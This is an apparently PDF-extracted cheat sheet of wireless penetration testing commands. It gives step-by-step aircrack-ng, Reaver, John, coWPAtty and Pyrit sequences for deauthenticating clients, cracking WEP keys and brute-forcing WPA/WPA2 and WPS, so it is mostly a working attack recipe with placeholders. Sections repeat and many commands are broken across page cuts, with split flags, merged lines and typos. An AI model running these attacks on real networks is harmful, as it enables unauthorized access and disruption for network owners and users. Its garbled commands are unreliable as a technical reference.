

### Wireless Penetration Testing Cheat Sheet

WIRELESS ANTENNA

Kill Monitor Processes root@kali:~# airmon-ng check kill Open the Monitor Mode root@kali:~# ifconfig wlan0 down root@kali:~# airmon-ng start wlan0 # if you get an error with airmon-ng command, try this; # iwconfig wlan0 mode monitor # use wlan0 instead of mon0 root@kali:~# ifconfig wlan0 up Increase Wi-Fi TX Power root@kali:~# iw reg set B0 root@kali:~# iwconfig wlan0 txpower <Nm-W|NdBm|off|auto> #txpower is 30 (generally) #txpower is depends your country, please googling root@kali:~# iwconfig Change WiFi Channel root@kali:~# iwconfig wlan0 channel <Se-

FIND HIDDEN SSID

tChannel(1-14)>

root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> mon0

# Wireless Penetration Testing Cheat Sheet (cont)

root@kali:~# aireplay-ng -0 20 -a <BSSID> -c <VictimMac> mon0

WEP CRACKING (via Client)

Method 1: ARP Request Replay Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Chann-el> --bssid <BSSID> -w <FileName> mon0 #What's my mac?

root@kali:~# macchanger --show mon0 root@kali:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> mon0 root@kali:~# aircrack-ng -b <BSSID> <PC-AP\_of\_FileName>

Method 2: Interactive Packet Replay Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Chann-el> --bssid <BSSID> -w <FileName> mon0 #What's my mac?

root@kali:~# macchanger --show mon0 root@kali:~# aireplay-ng -1 0 -a <BSSID> h <OurMac> -e <ESSID> mon0 root@kali:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> mon0

root@kali:~# aircrack-ng -b <BSSID> <PC-AP\_of\_FileName>

Method 3: SKA (Shared Key Authentication)
Type Cracking

root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> mon0

# Wireless Penetration Testing Cheat Sheet (cont)

root@kali:~# aireplay-ng -1 0 -e <ESSID> -y <keystream file> -a <BSSID> -h <OurMa-c> mon0
root@kali:~# aireplay-ng -3 -b <BSSID> -h
<FakedMac> mon0
root@kali:~# aireplay-ng -0 1 -a <BSSID> -h <FakedMac> mon0
root@kali:~# aircrack-ng <PCAP\_of\_Fil-eName>

#### **Wireless Penetration Testing Cheat Sheet**

WEP CRACKING (Clientless)

Method 1: Chop Chop Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0
#What's my mac?

root@kali:~# macchanger --show mon0
root@kali:~# aireplay-ng -1 0 -e <ESSID> a <BSSID> -h <OurMac> mon0
root@kali: # aireplay ng 4 h <BSSID> h

root@kali:~# aireplay-ng -4 -b <BSSID> -h <OurMac> mon0

#Press 'y';

root@kali:~# packetforge-ng -0 -a <BS-SID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR\_PacketFile> -w <FileName2>

root@kali:~# aireplay-ng -2 -r <FileName-2> mon0

root@kali:~# aircrack-ng <PCAP\_of\_FileName>

Method 2: Fragmentation Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 #What's my mac?

root@kali:~# macchanger --show mon0

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# Wireless Penetration Testing Cheat Sheet (cont)

root@kali:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0
root@kali:~# aireplay-ng -5 -b<BSSID> -h
< OurMac > mon0
#Press 'y';
root@kali:~# packetforge-ng -0 -a <BSSID> -h < OurMac > -k <SourceIP> -I <DestinationIP> -y <XOR\_PacketFile> -w <FileName2>
root@kali:~# aireplay-ng -2 -r <FileName2>

root@kali:~# aircrack-ng <PCAP\_of\_Fil-

WPA / WPA2 CRACKING

eName>

Method 1: WPS Attack root@kali:~# airmon-ng start wlan0 root@kali:~# apt-get install reaver root@kali:~# wash -i mon0 root@kali:~# reaver -i mon0 -b <BSSID> vv –S #or, Specific attack root@kali:~# reaver -i mon0 -c <Channel> -b <BSSID> -p <PinCode> -vv -S Method 2: Dictionary Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked\_PCAP> Method 3: Crack with John The Ripper

# Wireless Penetration Testing Cheat Sheet (cont)

root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# cd /pentest/passwords/john root@kali:~# ./john -wordlist=<Wordlist> -rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP\_of\_FileName> root@kali:~# aircrack-ng <FileName>.cap -J <outFile> root@kali:~# hccap2john <outFile>.hccap > <JohnOutFile> root@kali:~# john <JohnOutFile> Method 4: Crack with coWPAtty root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID> root@kali:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName> root@kali:~# cowpatty -r <PCAP\_of\_FileName> -d <HashesFileName> -2 -s <SS-Method 5: Crack with Pyrit root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# pyrit -r<PCAP\_of\_FileName> -b <BSSID> -i <Wordlist> attack\_passtroot@kali:~# pyrit -i <Wordlist> import\_passwords root@kali:~# pyrit -e <ESSID> create-\_essid root@kali:~# pyrit batch root@kali:~# pyrit -r <PCAP\_of\_FileName> attack db

# Wireless Penetration Testing Cheat Sheet (cont)

Method 6: Precomputed WPA Keys Database Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# kwrite ESSID.txt root@kali:~# airolib-ng NEW\_DB --import essid ESSID.txt root@kali:~# airolib-ng NEW\_DB --import passwd < Dictionary File> root@kali:~# airolib-ng NEW\_DB --clean all root@kali:~# airolib-ng NEW\_DB --stats root@kali:~# airolib-ng NEW\_DB --batch root@kali:~# airolib-ng NEW\_DB --verify all root@kali:~# aircrack-ng -r NEW\_DB <Ha-

#### **Wireless Penetration Testing Cheat Sheet**

#### WEP CRACKING (Clientless)

ndshaked\_PCAP>

Method 1: Chop Chop Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0
#What's my mac?
root@kali:~# macchanger --show mon0
root@kali:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> mon0
root@kali:~# aireplay-ng -4 -b <BSSID> -h
<OurMac> mon0
#Press 'y';



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# Wireless Penetration Testing Cheat Sheet (cont)

root@kali:~# packetforge-ng -0 -a <BS-SID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR\_PacketFile> -w <FileName2>

root@kali:~# aireplay-ng -2 -r <FileName2>

root@kali:~# aircrack-ng <PCAP\_of\_FileName>

Method 2: Fragmentation Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 #What's my mac?

root@kali:~# macchanger --show mon0 root@kali:~# aireplay-ng -1 0 -e <ESSID> a <BSSID> -h <OurMac> mon0 root@kali:~# aireplay-ng -5 -b<BSSID> -h < OurMac > mon0

#Press 'y';

root@kali:~# packetforge-ng -0 -a <BS-SID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR\_PacketFile> -w <FileName2>

root@kali:~# aireplay-ng -2 -r <FileName2>

root@kali:~# aircrack-ng <PCAP\_of\_FileName>

### WPA / WPA2 CRACKING

Method 1: WPS Attack
root@kali:~# airmon-ng start wlan0
root@kali:~# apt-get install reaver
root@kali:~# wash –i mon0
root@kali:~# reaver –i mon0 –b <BSSID> vv –S

# Wireless Penetration Testing Cheat Sheet (cont)

#or, Specific attack root@kali:~# reaver -i mon0 -c <Channel> -b <BSSID> -p <PinCode> -vv -S Method 2: Dictionary Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked\_PCAP> Method 3: Crack with John The Ripper root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# cd /pentest/passwords/john root@kali:~# ./john -wordlist=<Wordlist> -rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP\_of\_FileName> #or root@kali:~# aircrack-ng <FileName>.cap -J <outFile> root@kali:~# hccap2john <outFile>.hccap > <JohnOutFile> root@kali:~# john <JohnOutFile> Method 4: Crack with coWPAtty root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID> root@kali:~# genpmk -s <SSID> -f <Wo-

# Wireless Penetration Testing Cheat Sheet (cont)

Method 5: Crack with Pyrit root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# pyrit -r<PCAP\_of\_FileName> -b <BSSID> -i <Wordlist> attack\_passthrough root@kali:~# pyrit -i <Wordlist> import\_paroot@kali:~# pyrit -e <ESSID> create-\_essid root@kali:~# pyrit batch root@kali:~# pyrit -r <PCAP\_of\_FileName> attack\_db Method 6: Precomputed WPA Keys Database Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# kwrite ESSID.txt root@kali:~# airolib-ng NEW\_DB --import essid ESSID.txt root@kali:~# airolib-ng NEW\_DB --import passwd < Dictionary File> root@kali:~# airolib-ng NEW\_DB --clean all root@kali:~# airolib-ng NEW\_DB --stats root@kali:~# airolib-ng NEW\_DB --batch root@kali:~# airolib-ng NEW\_DB --verify all root@kali:~# aircrack-ng -r NEW\_DB <Handshaked\_PCAP>



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rdlist> -d <HashesFileName>

ID>

root@kali:~# cowpatty -r <PCAP\_of\_FileName> -d <HashesFileName> -2 -s <SS-

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#### WPA/ WPA2 Cracking

Method 1: WPS Attack root@kali:~# airmon-ng start wlan0 root@kali:~# apt-get install reaver root@kali:~# wash -i mon0 root@kali:~# reaver -i mon0 -b <BSSID> vv -S #or, Specific attack root@kali:~# reaver -i mon0 -c <Channel> -b <BSSID> -p <PinCode> -vv -S Method 2: Dictionary Attack root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked\_PCAP> Method 3: Crack with John The Ripper root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# cd /pentest/passwords/john root@kali:~# ./john -wordlist=<Wordlist> -rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP\_of\_FileName> #or root@kali:~# aircrack-ng <FileName>.cap -

### WPA/ WPA2 Cracking (cont)

root@kali:~# john <JohnOutFile> Method 4: Crack with coWPAtty root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID> root@kali:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName> root@kali:~# cowpatty -r <PCAP\_of\_FileName> -d <HashesFileName> -2 -s <SSID> Method 5: Crack with Pyrit root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <Channel> -bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0 root@kali:~# pyrit -r<PCAP\_of\_FileName> -b <BSSID> -i <Wordlist> attack\_passtroot@kali:~# pyrit -i <Wordlist> import\_passwords root@kali:~# pyrit -e <ESSID> create-\_essid root@kali:~# pyrit batch root@kali:~# pyrit -r <PCAP\_of\_FileName> attack\_db Method 6: Precomputed WPA Keys **Database Attack** root@kali:~# airmon-ng start wlan0 root@kali:~# airodump-ng -c <AP\_Channel> --bssid <BSSID> -w <FileName> mon0 root@kali:~# aireplay-ng -0 1 -a <BSSID> c <VictimMac> mon0

### WPA/ WPA2 Cracking (cont)

root@kali:~# airolib-ng NEW\_DB --import essid ESSID.txt root@kali:~# airolib-ng NEW\_DB --import passwd <DictionaryFile> root@kali:~# airolib-ng NEW\_DB --clean all root@kali:~# airolib-ng NEW\_DB --stats root@kali:~# airolib-ng NEW\_DB --batch root@kali:~# airolib-ng NEW\_DB --verify all root@kali:~# airorack-ng -r NEW\_DB <Handshaked\_PCAP>



J <outFile>

<JohnOutFile>

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root@kali:~# hccap2john <outFile>.hccap >

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Page 4 of 4.

root@kali:~# kwrite ESSID.txt

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